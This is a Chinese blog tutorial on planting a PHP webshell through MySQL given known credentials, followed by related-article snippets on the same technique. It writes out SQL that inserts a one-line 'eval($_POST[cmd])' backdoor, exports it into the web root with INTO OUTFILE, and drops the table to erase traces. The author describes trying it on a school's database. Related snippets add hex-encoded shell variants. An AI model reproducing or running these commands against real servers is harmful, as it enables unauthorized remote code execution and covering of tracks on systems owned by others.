利用mysql拿webshell_【教程】利用MySQL拿webshell

最新推荐文章于 2022-11-20 12:35:36 发布
最新推荐文章于 2022-11-20 12:35:36 发布
阅读量291 收藏
点赞数
文章标签: 利用mysql拿webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39612038/article/details/113277233
版权

利用MySQL拿webshell

前提:在知道数据库地址、数据库用户名、密码的情况下(先在本地的数据库验证一下想法的可行性)

1.打开任意数据库并创建一个表

create TABLE a (cmd text NOT NULL);

2.插入一句话木马

insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');

3.导出一句话木马 (通过phpinfo发现绝对路径)

select cmd from a into outfile '/mnt/sdcard/www/ma.php';

1e5655eeb9b329a6a810a288fe3c1a7e.png

4.执行成功后打开绝对路径查看是否创建了ma.php并查看内容是否为一句话木马

70a0a2a06ea6f1f6ad44acad231bd860.png

成功插入

5.删除刚刚创建的表(擦屁股走人)

Drop TABLE IF EXISTS a;

但测试很美好实战问题就一大堆了

将刚刚在本地测试的语句中运用到学校数据库,报了1290错误。。。

最低0.47元/天 解锁文章
weixin_39612038
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
mssql中public和db_owner权限下拿到webshell或者系统权限
CC's Blog
11-07 3381
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确
mssql拿shell
最新发布
m0_55772907的博客
11-20 773
getshell
2020-09-08
qq_44773168的博客
09-08 383
ES6的模块化 (1) export 导出 {} {}不是对象,可以同时导出多次 let a = 1; let b = 2; export{a}; export{b}; 等价于 export{a,b} (2) export default {} {}内是对象,只能导出一次 let a = 1; let b = 2; export{a,b}; 不管export default导出的是什么,导入的时候都可以使用任意一个变量 (3) import 导入 由于nodejs不支持E
Mysql root账号general_log_file方法获取webshell
weixin_44023460的博客
12-08 357
Mysql root账号general_log_file方法获取webshell by antian365.com simeon 在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取w...
mysql数据库拿shell_利用数据库拿shell的一些姿势
weixin_34569317的博客
01-26 2132
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入,写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
DB权限拿webshell_提权(语音)
11-28
DB权限拿webshell_提权(语音)
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
哥斯拉1.0_webshell管理_
09-30
【标题】:“哥斯拉1.0_webshell管理_”是一个关于使用名为“哥斯拉”的Webshell管理工具的专题,旨在帮助用户更好地理解和操作Webshell以进行网站安全管理。 【描述】:哥斯拉1.0是一款高效且功能丰富的Webshell...
Mysql示例数据库sql文件打包下载
09-17
Mysql示例数据库sql文件打包下载,测试学习mysql数据库,非常有用。也可以直接去mysql官方网站下载:https://dev.mysql.com/doc/
浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL
gscaiyucheng的专栏
02-28 9962
昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EXISTS temp; //如果存在temp就删掉   Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段   Insert INT
Mysql得到WebshellMySql Backup WebShell
黑客X元素
04-05 4445
Mysql得到WebshellMySql Backup WebShell)此文已发表到《黑客X档案》2005年第1期,请装载时著名来源:黑客X元素Author:XaCk3rEmail:Xack3r@xhacker.cnHTTP://www.xhacker.cn    此篇文章是在一次入侵后的总结,无聊,拿到台湾的一个web站点做测试,开篇进入正题吧!开始拿到web地址时,Ping操作,接着就是
mysql创建木马_Mysql的语句生成后门木马的方法
weixin_39835607的博客
02-18 116
咳咳,大家看看就好了,本人不负责所产生的后果代码如下:SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.p...
select into outfile导出webshell技巧
收集盒 Book box
01-14 6789
select into outfile导出webshell技巧   在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的   比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3
MySQLWebShell总结
Poolhuang的博客
05-27 441
1、写入方式 ①、基于outfile写入 union select 例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ; ###利用分隔符写入 lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。 例:?id=1 into outfile '物理路径' lines terminated by '<?php .
mysqlshell
baidu_39504221的博客
12-18 599
一般前提: 有权限,有绝对路径 一般写文件 select 0x3c3f70687020406576616c28245f504f53545b2774657374275d293f3e into outfile'D:\\phpstudy_pro\\WWW\\shell.php'; 以sqli-labs第七关为例 虽然这里报错了,但是文件还是写进去了 后面就可以用菜刀连接了 ...
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3626
Mysql写入webshell
2021护网行动面试题目.pdf
03-30
一种常见手法是利用`SELECT`语句的`into outfile`特性来写入shell脚本(webshell),如`select 'payload' into outfile '/path/to/webshell'`。这需要满足以下条件: - 攻击者需要知道数据库的绝对路径,且MySQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值